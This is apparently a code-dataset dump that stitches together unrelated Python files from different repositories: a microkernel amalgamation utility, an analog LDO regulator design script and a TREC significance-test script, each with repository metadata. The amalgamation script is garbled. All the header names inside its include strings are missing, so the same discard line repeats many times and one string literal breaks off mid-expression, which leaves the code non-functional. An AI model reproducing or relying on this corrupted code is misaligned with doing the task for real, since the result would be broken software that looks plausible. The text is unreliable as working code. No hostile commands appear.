"repo_name": "xmyildiz/Civilization_MPDrafter", "sub_path": "scripts/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 10243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": 
[{"api_name": "dotenv.load_dotenv", "line_number": 28, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.Intents.default", "line_number": 33, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 33, "usage_type": "attribute"}, {"api_name": "discord.Bot", "line_number": 38, "usage_type": "call"}, {"api_name": "gamelobby.GameLobby", "line_number": 62, "usage_type": "call"}, {"api_name": "discord.AutocompleteContext", "line_number": 71, "usage_type": "attribute"}, {"api_name": "gamedata.CIVILIZATIONS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 75, "usage_type": "attribute"}, {"api_name": "gamedata.TIERS", "line_number": 77, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 79, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 84, "usage_type": "attribute"}, {"api_name": "gamedata.CIVILIZATIONS", "line_number": 86, "usage_type": "attribute"}, {"api_name": "discord.AutocompleteContext", "line_number": 88, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 104, "usage_type": "attribute"}, {"api_name": "gamelobby.GameLobby", "line_number": 106, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 101, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 102, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 103, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 114, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 120, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 124, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 128, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 135, "usage_type": "attribute"}, {"api_name": "discord.commands.option", "line_number": 133, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 134, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 156, "usage_type": "attribute"}, {"api_name": "discord.commands.option", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 155, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 164, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 171, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 176, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 181, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 186, "usage_type": "attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 197, "usage_type": "attribute"}, {"api_name": "gamedata.info_atc", "line_number": 198, "usage_type": "call"}, {"api_name": "discord.ApplicationContext", "line_number": 203, "usage_type": "attribute"}, {"api_name": "gamedata.info_tfc", "line_number": 204, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 201, "usage_type": "call"}, {"api_name": "discord.utils.basic_autocomplete", "line_number": 202, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 202, "usage_type": 
"attribute"}, {"api_name": "discord.ApplicationContext", "line_number": 209, "usage_type": "attribute"}, {"api_name": "gamedata.info_cft", "line_number": 210, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 207, "usage_type": "call"}, {"api_name": "discord.utils.basic_autocomplete", "line_number": 208, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 208, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 229, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 225, "usage_type": "call"}, {"api_name": "discord.commands.option", "line_number": 226, "usage_type": "call"}]}
+{"seq_id": "33398067543", "text": "import argparse\nimport codecs\nimport math\nimport os\nimport re\nimport sys\nimport yaml\n\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nparser = argparse.ArgumentParser(\n description='Amalgamation utility for microkernels')\nparser.add_argument(\"-s\", \"--set\", metavar=\"SET\", required=True,\n help=\"List of microkernel filenames in the BUILD.bazel file\")\nparser.add_argument(\"-i\", \"--include\", metavar=\"INCLUDE\",\n help=\"Header file to include (e.g. immintrin.h, arm_neon.h)\")\nparser.add_argument(\"-o\", \"--output\", metavar=\"FILE\", required=True,\n help='Output (C source) file')\n\n\ndef main(args):\n options = parser.parse_args(args)\n\n build_path = os.path.join(ROOT_DIR, \"..\", \"BUILD.bazel\")\n\n with codecs.open(build_path, \"r\", encoding=\"utf-8\") as build_file:\n build_text = build_file.read()\n\n pattern = r\"\\b\" + options.set + r\"\\b\\s*=\\s*\\[\"\n match = re.search(pattern, build_text)\n if not match:\n raise ValueError(\n \"Failed to find file set %s (regex \\\"%s\\\") inside the BUILD.bazel file\" %\n (options.set, pattern))\n\n start_pos = match.end()\n end_pos = build_text.find(\"]\", start_pos)\n\n fileset = [filename.strip()[1:-1] for filename in\n build_text[start_pos:end_pos].split(\",\")]\n\n amalgam_lines = list()\n amalgam_includes = set()\n for filename in sorted(fileset):\n if not filename:\n continue\n\n filepath = os.path.join(ROOT_DIR, \"..\", filename)\n with codecs.open(filepath, \"r\", encoding=\"utf-8\") as file:\n filelines = file.read().splitlines()\n\n consumed_license = False\n consumed_includes = False\n for line in filelines:\n if line.startswith(\"//\"):\n if not consumed_license:\n # Skip and generate a standard license header for amalgamated file\n continue\n elif line.lstrip().startswith(\"#\"):\n if not consumed_includes:\n amalgam_includes.add(line)\n continue\n consumed_license = True\n elif not line:\n if not consumed_includes:\n # Skip empty lines until end of headers\n continue\n else:\n consumed_license = True\n consumed_includes = True\n\n amalgam_lines.append(line)\n\n amalgam_lines.append(\"\")\n\n # Multi-line sequence for XOP intrinsics, which don't have a standardized header\n amalgam_includes.discard(\"#ifdef _MSC_VER\")\n amalgam_includes.discard(\" #include \")\n amalgam_includes.discard(\"#else\")\n amalgam_includes.discard(\" #include \")\n amalgam_includes.discard(\"#endif\")\n\n # Single-line sequences for intrinsics with a standardized header\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n amalgam_includes.discard(\"#include \")\n\n amalgam_text = \"\"\"\\\n// Copyright 2021 Google LLC\n//\n// This source code is licensed under the BSD-style license found in the\n// LICENSE file in the root directory of this source tree.\n\n\"\"\"\n\n amalgam_text += \"\\n\".join(sorted(inc for inc in amalgam_includes if\n not inc.startswith(\"#include \\n\"\n amalgam_text += \"#else\\n\"\n amalgam_text += \" #include \\n\"\n amalgam_text += \"#endif\\n\\n\"\n else:\n amalgam_text += \"\\n\\n#include <%s>\\n\\n\" % options.include\n else:\n amalgam_text += \"\\n\\n\"\n amalgam_text += \"\\n\".join(sorted(inc for inc in amalgam_includes if\n 
inc.startswith(\"#include Mapping[str,str]:\n # type: () -> Dict[str, str]\n \"\"\"Returns a dictionary from parameter names to descriptions.\n\n Returns\n -------\n param_info : Optional[Dict[str, str]]\n dictionary from parameter names to descriptions.\n \"\"\"\n ans = super().get_params_info()\n # TODO: add resistors to specfile_dict and th_dict \n ans.update(dict(\n specfile_dict = 'Transistor database spec file names for each device',\n series_type = 'n or p for type of series device',\n th_dict = 'Transistor flavor dictionary.',\n l_dict = 'Transistor channel length dictionary',\n sim_env = 'Simulation environment',\n vdd = 'Supply voltage in volts.',\n vout = 'Reference voltage to regulate the output to',\n loadreg = 'Maximum absolute change in output voltage given change in output current',\n ibias = 'Maximum bias current of amp and biasing, in amperes.',\n rload = 'Load resistance from the output of the LDO to ground',\n cload = 'Load capacitance from the output of the LDO to ground',\n psrr = 'Minimum power supply rejection ratio (dB, 20*log10(dVdd/dVout))',\n psrr_fbw = 'Minimum bandwidth for power supply rejection roll-off',\n pm = 'Minimum phase margin for the large feedback loop',\n amp_dsn_params = \"Amplifier design parameters that aren't either calculated or handled above\",\n bias_dsn_params = \"Design parameters for the biasing that aren't calculated or handled above.\",\n tb_stb_params = '',\n tb_loadreg_params = '',\n run_sim = 'True to check figures of merit against simulation rather than just LTI',\n ))\n return ans\n\n def dsn_fet(self, **params):\n specfile_dict = params['specfile_dict']\n series_type = params['series_type']\n th_dict = params['th_dict']\n sim_env = params['sim_env']\n\n db_dict = {k:get_mos_db(spec_file=specfile_dict[k],\n intent=th_dict[k],\n sim_env=sim_env) for k in specfile_dict.keys()}\n\n vdd = params['vdd']\n vout = params['vout']\n vg = params['vg']\n rload = params['rload']\n\n vs = vout if series_type == 'n' else vdd\n vd = vdd if series_type == 'n' else vout\n vb = 0 if series_type == 'n' else vdd\n\n ser_op = db_dict['ser'].query(vgs=vg-vs, vds=vd-vs, vbs=vb-vs)\n idc = vout/rload\n nf = int(round(idc/ser_op['ibias']))\n return nf > 1, dict(nf=nf, op=ser_op)\n\n\n def meet_spec(self, **params) -> List[Mapping[str,Any]]:\n specfile_dict = params['specfile_dict']\n th_dict = params['th_dict']\n l_dict = params['l_dict']\n sim_env = params['sim_env']\n run_sim = params['run_sim']\n\n # TODO simulating\n tb_stb_params = params['tb_stb_params']\n tb_loadreg_params = params['tb_loadreg_params']\n tb_num = 0\n\n db_dict = {k:get_mos_db(spec_file=specfile_dict[k],\n intent=th_dict[k],\n sim_env=sim_env) for k in specfile_dict.keys()}\n\n ser_type = params['series_type']\n vdd = params['vdd']\n vout = params['vout']\n loadreg = params['loadreg'] # TODO load regulation\n ibias_max = params['ibias']\n rload = params['rload']\n cload = params['cload']\n psrr_min = params['psrr']\n psrr_fbw_min = params['psrr_fbw']\n pm_min = params['pm']\n loadreg_max = params['loadreg']\n\n vth_ser = estimate_vth(db=db_dict['ser'],\n is_nch=ser_type=='n',\n lch=l_dict['ser'],\n vgs=vdd-vout if ser_type=='n' else vout-vdd,\n vbs=0-vout if ser_type=='n' else vdd-vdd)\n \n # Spec out amplifier\n amp_specfile_dict = dict()\n amp_th_dict = dict()\n amp_l_dict = dict()\n\n for k in ('in', 'tail', 'load'):\n amp_specfile_dict[k] = specfile_dict[f'amp_{k}']\n amp_th_dict[k] = th_dict[f'amp_{k}']\n amp_l_dict[k] = l_dict[f'amp_{k}']\n amp_dsn_params = 
dict(params['amp_dsn_params'])\n amp_dsn_params.update(dict(vincm=vout,\n specfile_dict=amp_specfile_dict,\n th_dict=amp_th_dict,\n l_dict=amp_l_dict,\n sim_env=sim_env,\n vdd=vdd))\n\n # Spec out biasing\n bias_specfile_dict = dict()\n bias_th_dict = dict()\n bias_l_dict = dict()\n for k in ('n', 'p'):\n bias_specfile_dict[k] = specfile_dict[f'bias_{k}']\n bias_th_dict[k] = th_dict[f'bias_{k}']\n bias_l_dict[k] = l_dict[f'bias_{k}']\n bias_dsn_params = dict(params['bias_dsn_params'])\n bias_dsn_params.update(dict(specfile_dict=bias_specfile_dict,\n th_dict=bias_th_dict,\n l_dict=bias_l_dict,\n sim_env=sim_env,\n vdd=vdd))\n\n # Keep track of viable ops\n viable_op_list = []\n\n self.other_params = dict(l_dict=l_dict,\n w_dict={k:db.width_list[0] for k,db in db_dict.items()},\n th_dict=th_dict,\n rload=rload,\n cload=cload,\n series_type=ser_type)\n\n amp_dsn_mod = bag2_analog__amp_diff_mirr_dsn()\n bias_dsn_mod = bag2_analog__constant_gm_dsn()\n\n # Sweep gate bias voltage of the series device\n vg_min = vout+vth_ser\n vg_max = min(vdd+vth_ser, vdd)\n vg_vec = np.arange(vg_min, vg_max, 10e-3)\n\n for vg in vg_vec:\n print('Designing the series device...')\n # Size the series device\n match_ser, ser_info = self.dsn_fet(vg=vg, **params)\n if not match_ser:\n continue\n print('Done')\n\n # Design amplifier s.t. output bias = gate voltage\n # This is to maintain accuracy in the computational design process\n print('Designing the amplifier...')\n ser_op = ser_info['op']\n amp_cload = ser_op['cgg']\n amp_dsn_params.update(dict(cload=amp_cload,\n optional_params=dict(voutcm=vg),\n ibias=ibias_max))\n try:\n disable_print()\n amp_dsn_lst = amp_dsn_mod.meet_spec(**amp_dsn_params)\n except ValueError:\n continue\n finally:\n enable_print()\n print(f'{len(amp_dsn_lst)} viable amps')\n\n # For each possibility, design the biasing\n for amp_dsn_info in amp_dsn_lst:\n if amp_dsn_params['in_type'] == 'n':\n bias_dsn_params.update(dict(vref=dict(n=amp_dsn_info['vgtail']),\n res_side='n'),\n ibias=ibias_max-amp_dsn_info['ibias'])\n else:\n bias_dsn_params.update(dict(vref=dict(p=amp_dsn_info['vgtail']),\n res_side='p'),\n ibias=ibias_max-amp_dsn_info['ibias'])\n\n print(f'Attempting to design biasing...')\n try:\n disable_print()\n _, bias_dsn_info = bias_dsn_mod.design(**bias_dsn_params)\n except ValueError:\n continue\n finally:\n enable_print()\n print('Done')\n\n op_dict = {'in' : amp_dsn_info['op_in'],\n 'tail' : amp_dsn_info['op_tail'] ,\n 'load' : amp_dsn_info['op_load'],\n 'ser' : ser_info['op']}\n\n nf_dict = {'in' : amp_dsn_info['nf_in'],\n 'tail' : amp_dsn_info['nf_tail'],\n 'load' : amp_dsn_info['nf_load'],\n 'ser' : ser_info['nf']}\n\n ## Check PSRR\n psrr_lti, psrr_fbw_lti, = self._get_psrr_lti(op_dict=op_dict,\n nf_dict=nf_dict,\n series_type=ser_type,\n amp_in=amp_dsn_params['in_type'],\n rload=rload,\n cload=cload)\n\n if psrr_lti < psrr_min:\n print(f'psrr {psrr_lti}')\n continue\n\n if psrr_fbw_lti < psrr_fbw_min:\n print(f'psrr fbw {psrr_fbw_lti}')\n continue\n\n ## Check phase margin\n pm_lti = self._get_stb_lti(op_dict=op_dict, \n nf_dict=nf_dict, \n series_type=ser_type,\n rload=rload,\n cload=cload)\n\n if np.isnan(pm_lti):\n pm_lti = -1\n\n if pm_lti < pm_min:\n print(f'pm {pm_lti}')\n continue\n\n ## Check load regulation\n loadreg_eqn = self._get_loadreg_eqn()\n if loadreg_eqn > loadreg_max:\n print(f'loadreg {loadreg_eqn}')\n continue\n\n op = dict(amp_params=amp_dsn_info,\n bias_params=bias_dsn_info,\n ser_params=ser_info, \n pm=pm_lti,\n psrr=psrr_lti,\n 
psrr_fbw=psrr_fbw_lti,\n loadreg=loadreg_eqn,\n vg=vg,\n amp_dsn=amp_dsn_params,\n bias_dsn=bias_dsn_params,\n amp_mod=amp_dsn_mod,\n bias_mod=bias_dsn_mod,)\n\n ### Run simulations if desired\n if run_sim:\n prj = BagProject()\n tb_sch_params = self.get_sch_params(op)\n ## Check PSRR\n psrr_sim, psrr_fbw_sim = self._get_psrr_sim()\n if psrr_sim < psrr_min:\n print(f'psrr {psrr_sim}')\n continue\n \n if psrr_fbw_sim < psrr_fbw_min:\n print(f'psrr fbw {psrr_fbw_sim}')\n continue\n\n ## Check phase margin\n tb_stb_vars = dict(CLOAD=cload,\n RLOAD=rload,\n VDD=vdd,\n VGTAIL=amp_dsn_info['vgtail'],\n VREF=vout)\n tb_stb_params = dict(tb_stb_params)\n tb_stb_params.update(dict(prj=prj,\n params=tb_sch_params,\n tb_vars=tb_stb_vars,\n num=tb_num))\n\n print('Simulating stability...')\n pm_sim = self._get_stb_sim(**tb_stb_params)\n print('...done')\n\n if pm_sim < pm_min:\n print(f'pm {pm_sim}')\n tb_num = tb_num + 1\n continue\n\n ## Check load regulation\n tb_loadreg_params = dict(tb_loadreg_params)\n # Default values\n tb_loadreg_vars_init = tb_loadreg_params['tb_vars']\n tb_loadreg_vars = dict(DUTYCYCLE=0.5,\n IHIGH=vout/rload*1.1,\n ILOW=vout/rload*0.9,\n TSTART=0,\n TSTOP=tb_loadreg_vars_init['TPER']*10,\n VDD=vdd,\n vref=vout)\n tb_loadreg_vars.update(tb_loadreg_params['tb_vars'])\n tb_loadreg_params.update(dict(prj=prj,\n params=tb_sch_params,\n tb_vars=tb_loadreg_vars,\n num=tb_num))\n\n print('Simulating load regulation...')\n loadreg_sim = self._get_loadreg_sim(**tb_loadreg_params)\n print('...done')\n\n if loadreg_sim > loadreg_max:\n print(f'load reg {loadreg_sim}')\n tb_num = tb_num + 1\n continue\n \n tb_num = tb_num + 1\n\n op.update(pm=pm_sim,\n psrr=psrr_sim,\n psrr_fbw=psrr_fbw_sim,\n loadreg=loadreg_sim)\n\n\n pprint(op)\n viable_op_list.append(op)\n\n return viable_op_list\n\n def _get_psrr_lti(self, op_dict, nf_dict, series_type, amp_in, rload, cload) -> float:\n '''\n Outputs:\n psrr: PSRR (dB)\n fbw: Power supply -> output 3dB bandwidth (Hz)\n '''\n n_ser = series_type == 'n'\n n_amp = amp_in == 'n'\n\n # Supply -> output gain\n ckt_sup = LTICircuit()\n ser_d = 'vdd' if n_ser else 'reg'\n ser_s = 'reg' if n_ser else 'vdd'\n inp_conn = 'gnd' if n_ser else 'reg'\n inn_conn = 'reg' if n_ser else 'gnd'\n tail_rail = 'gnd' if n_amp else 'vdd'\n load_rail = 'vdd' if n_amp else 'gnd'\n ckt_sup.add_transistor(op_dict['ser'], ser_d, 'out', ser_s, fg=nf_dict['ser'], neg_cap=False)\n ckt_sup.add_res(rload, 'reg', 'gnd')\n ckt_sup.add_cap(cload, 'reg', 'gnd')\n ckt_sup.add_transistor(op_dict['in'], 'outx', inp_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['in'], 'out', inn_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['tail'], 'tail', 'gnd', tail_rail, fg=nf_dict['tail'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['load'], 'outx', 'outx', load_rail, fg=nf_dict['load'], neg_cap=False)\n ckt_sup.add_transistor(op_dict['load'], 'out', 'outx', load_rail, fg=nf_dict['load'], neg_cap=False)\n\n num_sup, den_sup = ckt_sup.get_num_den(in_name='vdd', out_name='reg', in_type='v')\n gain_sup = num_sup[-1]/den_sup[-1]\n wbw_sup = get_w_3db(num_sup, den_sup)\n\n # Reference -> output gain\n # ckt_norm = LTICircuit()\n # ser_d = 'gnd' if n_ser else 'reg'\n # ser_s = 'reg' if n_ser else 'gnd'\n # inp_conn = 'in' if n_ser else 'reg'\n # inn_conn = 'reg' if n_ser else 'in'\n # ckt_norm.add_transistor(op_dict['ser'], ser_d, 'out', ser_s, fg=nf_dict['ser'], neg_cap=False)\n # ckt_norm.add_res(rload, 'reg', 'gnd')\n # 
ckt_norm.add_cap(rload, 'reg', 'gnd')\n # ckt_norm.add_transistor(op_dict['in'], 'outx', inp_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['in'], 'out', inn_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['tail'], 'tail', 'gnd', 'gnd', fg=nf_dict['tail'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['load'], 'outx', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n # ckt_norm.add_transistor(op_dict['load'], 'out', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n\n # num_norm, den_norm = ckt_norm.get_num_den(in_name='in', out_name='reg', in_type='v')\n # gain_norm = num_norm[-1]/den_norm[-1]\n\n if gain_sup == 0:\n return float('inf'), 0\n if wbw_sup is None:\n wbw_sup = 0\n fbw_sup = wbw_sup / (2*np.pi)\n\n psrr = 10*np.log10((1/gain_sup)**2)\n\n return psrr, fbw_sup\n\n def _get_stb_lti(self, op_dict, nf_dict, series_type, rload, cload) -> float:\n '''\n Returns:\n pm: Phase margins (in degrees)\n '''\n ckt = LTICircuit()\n\n n_ser = series_type == 'n'\n \n # Series device\n ser_d = 'gnd' if n_ser else 'reg'\n ser_s = 'reg' if n_ser else 'gnd'\n ckt.add_transistor(op_dict['ser'], ser_d, 'out', ser_s, fg=nf_dict['ser'], neg_cap=False)\n\n # Load passives\n ckt.add_res(rload, 'reg', 'gnd')\n ckt.add_cap(cload, 'reg', 'gnd')\n # TODO include any compensation passives\n\n # Amplifier\n inp_conn = 'gnd' if n_ser else 'in'\n inn_conn = 'gnd' if not n_ser else 'in' \n ckt.add_transistor(op_dict['in'], 'outx', inp_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt.add_transistor(op_dict['in'], 'out', inn_conn, 'tail', fg=nf_dict['in'], neg_cap=False)\n ckt.add_transistor(op_dict['tail'], 'tail', 'gnd', 'gnd', fg=nf_dict['tail'], neg_cap=False)\n ckt.add_transistor(op_dict['load'], 'outx', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n ckt.add_transistor(op_dict['load'], 'out', 'outx', 'gnd', fg=nf_dict['load'], neg_cap=False)\n\n # Calculating stability margins\n num, den = ckt.get_num_den(in_name='in', out_name='reg', in_type='v')\n pm, _ = get_stability_margins(np.convolve(num, [-1]), den)\n\n return pm\n\n def _get_loadreg_eqn(self) -> float:\n # TODO\n return 0.0\n\n def _get_psrr_sim(self, **spec):\n # TODO\n return np.inf, np.inf\n\n def _get_stb_sim(self, **spec):\n '''\n Inputs:\n prj: BagProject\n tb_vars: Testbench variables to set in ADE testbench\n tb_lib: The template testbench library.\n tb_cell: The template testbench cell.\n impl_lib: The implemented testbench library.\n tb_gen_name: The generated testbench base name.\n num: The generated testbench number.\n Outputs:\n pm: Simulated phase margin in degrees\n '''\n prj = spec['prj']\n tb_vars = spec['tb_vars']\n tb_lib = spec['tb_lib']\n tb_cell = spec['tb_cell']\n impl_lib = spec['impl_lib']\n # impl_cell = spec['impl_cell']\n tb_gen_name = self._get_tb_gen_name(spec['tb_gen_name'], spec['num'])\n\n # generate testbench schematic\n tb_dsn = prj.create_design_module(tb_lib, tb_cell)\n tb_dsn.design(**spec['params'])\n tb_dsn.implement_design(impl_lib, top_cell_name=tb_gen_name)\n\n # copy and load ADEXL state of generated testbench\n tb_obj = prj.configure_testbench(impl_lib, tb_gen_name)\n\n # Assign testbench design variables (the ones that show in ADE)\n for param_name, param_val in tb_vars.items():\n tb_obj.set_parameter(param_name, param_val)\n\n # Update testbench changes and run simulation\n tb_obj.update_testbench()\n print(f'Simulating testbench {tb_gen_name}')\n save_dir = tb_obj.run_simulation()\n\n # Load simulation results into 
Python\n print('Simulation done, loading results')\n results = load_sim_results(save_dir)\n\n pm = results.get('stb_pm', np.inf)\n\n return pm\n\n def _get_loadreg_sim(self, **spec):\n prj = spec['prj']\n tb_vars = spec['tb_vars']\n tb_lib = spec['tb_lib']\n tb_cell = spec['tb_cell']\n impl_lib = spec['impl_lib']\n # impl_cell = spec['impl_cell']\n tb_gen_name = self._get_tb_gen_name(spec['tb_gen_name'], spec['num'])\n\n # Generate testbench schematic\n tb_dsn = prj.create_design_module(tb_lib, tb_cell)\n tb_dsn.design(**(spec['params']))\n tb_dsn.implement_design(impl_lib, top_cell_name=tb_gen_name)\n\n # Copy and load ADEXL state of generated testbench\n tb_obj = prj.configure_testbench(impl_lib, tb_gen_name)\n\n # Assign testbench design variables (the ones that show in ADE)\n for param_name, param_val in tb_vars.items():\n tb_obj.set_parameter(param_name, param_val)\n\n # Update testbench changes and run simulation\n tb_obj.update_testbench()\n print(f'Simulating testbench {tb_gen_name}')\n save_dir = tb_obj.run_simulation()\n\n # Load simulation results into Python\n print(\"Simulation done, loading results\")\n results = load_sim_results(save_dir)\n\n vreg = results['tran_vreg']\n return abs(min(vreg)-max(vreg))\n # return min(vreg), max(vreg)\n\n def _get_tb_gen_name(self, base, num):\n return f'{base}_{num}'\n\n\n def op_compare(self, op1:Mapping[str,Any], op2:Mapping[str,Any]):\n return op1 if op1['ibias'] < op2['ibias'] else op2\n\n def get_sch_params(self, op):\n amp_dsn_info = op['amp_params']\n bias_dsn_info = op['bias_params']\n ser_dsn_info = op['ser_params']\n series_params = {'type' : self.other_params['series_type'],\n 'l' : self.other_params['l_dict']['ser'],\n 'w' : self.other_params['w_dict']['ser'],\n 'intent' : self.other_params['th_dict']['ser'],\n 'nf' : ser_dsn_info['nf']}\n\n amp_params = op['amp_mod'].get_sch_params(amp_dsn_info)\n biasing_params = op['bias_mod'].get_sch_params(bias_dsn_info)\n\n biasing_params.pop('res_side', None)\n\n # TODO real resistor\n biasing_params['th_dict'].update(dict(res='ideal'))\n\n # amp_params = dict(in_type=amp_dsn_info['in_type'],\n # l_dict=op['amp_dsn']['l_dict'],\n # w_dict=op['amp_dsn']['w_dict'],\n # th_dict=op['amp_dsn']['th_dict'],\n # seg_dict={'in' : amp_dsn_info['nf_in'],\n # 'tail' : amp_dsn_info['nf_tail'],\n # 'load' : amp_dsn_info['nf_load']})\n\n # biasing_params = dict(bulk_conn='VDD',\n # l_dict=op['bias_dsn']['l_dict'],\n # w_dict=op['bias_dsn']['w_dict'],\n # th_dict=op['bias_dsn']['th_dict'],\n # device_mult=)\n cap_conn_list = []\n cap_param_list = []\n res_conn_list = []\n res_param_list = []\n\n return dict(series_params=series_params,\n amp_params=amp_params,\n biasing_params=biasing_params,\n cap_conn_list=cap_conn_list,\n cap_param_list=cap_param_list,\n res_conn_list=res_conn_list,\n res_param_list=res_param_list)", "repo_name": "PisterLab/span_ion", "sub_path": "scripts_dsn/regulator_ldo_series.py", "file_name": "regulator_ldo_series.py", "file_ext": "py", "file_size_in_byte": 24067, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Mapping", "line_number": 28, "usage_type": "name"}, {"api_name": "amp_diff_mirr.bag2_analog__amp_diff_mirr_dsn", "line_number": 163, "usage_type": "call"}, {"api_name": "constant_gm.bag2_analog__constant_gm_dsn", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 250, 
"usage_type": "call"}, {"api_name": "bag.core.BagProject", "line_number": 278, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 345, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 87, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 87, "usage_type": "name"}, {"api_name": "bag.data.lti.LTICircuit", "line_number": 360, "usage_type": "call"}, {"api_name": "bag.data.lti.get_w_3db", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 402, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 404, "usage_type": "call"}, {"api_name": "bag.data.lti.LTICircuit", "line_number": 413, "usage_type": "call"}, {"api_name": "bag.data.lti.get_stability_margins", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 438, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 448, "usage_type": "attribute"}, {"api_name": "bag.io.load_sim_results", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 492, "usage_type": "attribute"}, {"api_name": "bag.io.load_sim_results", "line_number": 524, "usage_type": "call"}, {"api_name": "typing.Mapping", "line_number": 534, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 534, "usage_type": "name"}]}
+{"seq_id": "10075611518", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Compute statistical test on trec results.\"\"\"\n\nimport sys\nimport re\nimport json\nimport numpy\nfrom collections import defaultdict\nfrom scipy import stats\n\n\ndef load_trec_results(input):\n keys, scores = [], []\n with open(input, 'r') as f:\n for line in f:\n line = line.strip()\n line = re.sub(\"\\s+\", \" \", line)\n cols = line.split()\n if len(cols) == 3:\n keys.append(cols[1])\n scores.append(float(cols[2]))\n return (keys, scores)\n\n\ndef get_field_scores(scores, ids):\n tmp = []\n for i, id in enumerate(scores[0]):\n if id in ids:\n tmp.append(scores[1][i])\n return tmp\n\n\nwith open('data/topics/domains.json') as json_file:\n fields = json.load(json_file)\n field_to_topic_ids = defaultdict(list)\n for topic_id in fields:\n for field in fields[topic_id]:\n field_to_topic_ids[field].append(topic_id)\n\nscores_a = load_trec_results(sys.argv[1])\nscores_b = load_trec_results(sys.argv[2])\n\nassert(scores_a[0][:-1] == scores_b[0][:-1])\n\nprint('scoring for file: {}'.format(sys.argv[1]))\nprint('all: {0:.4f}'.format(numpy.average(scores_a[1][:-1])))\n\nprint('scoring for file: {}'.format(sys.argv[2]))\nprint('all: {0:.4f}'.format(numpy.average(scores_b[1][:-1])))\n\nprint(stats.ttest_rel(a=scores_a[1][:-1],\n b=scores_b[1][:-1]))\n\nprint('statistics for fields')\n# for field_id in range(1, 9):\nfor field_id in range(1, 3):\n\n field_scores_a = get_field_scores(scores_a, field_to_topic_ids[field_id])\n field_scores_b = get_field_scores(scores_b, field_to_topic_ids[field_id])\n\n print('field: {0}, size: {1}, score 1: {2:.4f}, score 2: {3:.4f}, delta: {4:.1f}, {5}, {6:.4f}'.format(\n field_id,\n len(field_to_topic_ids[field_id]),\n numpy.average(field_scores_a),\n numpy.average(field_scores_b),\n ((numpy.average(field_scores_b) / numpy.average(field_scores_a)) - 1 ) *100,\n stats.ttest_rel(a=field_scores_a, b=field_scores_b),\n (numpy.average(field_scores_b) - numpy.average(field_scores_a)) * 100\n ))\n\n# print('statistics for queries')\n# for i, id in enumerate(scores_a[0][:-1]):\n# print('query: {0}\\t{1:.4f}\\t{2:.4f}\\t{3}'.format(\n# id, \n# scores_a[1][i],\n# scores_b[1][i],\n# fields[id]\n# ))\n\n\n\n\n\n", "repo_name": "boudinfl/ir-using-kg", "sub_path": "src/ttest.py", "file_name": 